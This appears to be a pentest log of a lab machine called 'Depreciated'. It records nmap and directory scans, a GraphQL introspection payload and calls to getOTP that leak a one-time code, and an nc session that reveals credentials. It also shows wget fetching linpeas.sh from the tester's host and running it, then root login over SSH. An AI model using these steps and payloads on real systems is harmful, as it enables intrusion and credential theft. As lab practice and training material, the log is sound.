🧪 Pentest Log: {{date:2025-07-23}}

🔍 Target Information

• Machine Name: Depreciated
• IP Address: 192.168.238.170
• Operating System: Linux

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.238.170 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV 192.168.238.170 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.238.170 -oN udp_scan_result.txt

Port 22

ssh peter@192.168.238.170

Port 80

Web Content Enumeration

gobuster dir -u http://192.168.238.170 -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://192.168.238.170

wpscan -url http://192.168.238.170

dirsearch -u http://192.168.238.170 -r -o dirsearch.txt

Port 5132

nc 192.168.238.170 5132

help

read 234

found credential

peter:peter@safe

Port 8433

// Payload to show all function that could be called  
http://192.168.238.170:8433/graphql?query=fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}


// List user function  
http://192.168.238.170:8433/graphql?query={listUsers}


//Get OTP using getOTP function
http://192.168.238.170:8433/graphql?query={getOTP(username:%22peter%22)}

💣 Exploitation / Foothold

Tool / Script Used:

SSH into the target machine

🧬 Privilege Escalation

👤 Current Access

• User: peter
• Groups: peter
• Shell Type: ssh

🔍 Enumeration

Linpeas:

wget http://192.168.45.163:443/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

found the /opt/deprecated

peter@depreciated:/tmp$ echo "admin:password" > code.txt

kali@kali:nc 192.168.238.170 5132
read 0

found password

root:9>XsS+&=Zn#AS9-@

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: (e.g., Sudo Misconfig, SUID Abuse, Kernel Exploit) SSH
• Target Binary/Service: N/A
• Reference / Source: (GTFOBins, ExploitDB, CVE, etc.) N/A

🔧 Exploit Steps

• Smash to root

ssh root@192.169.238.170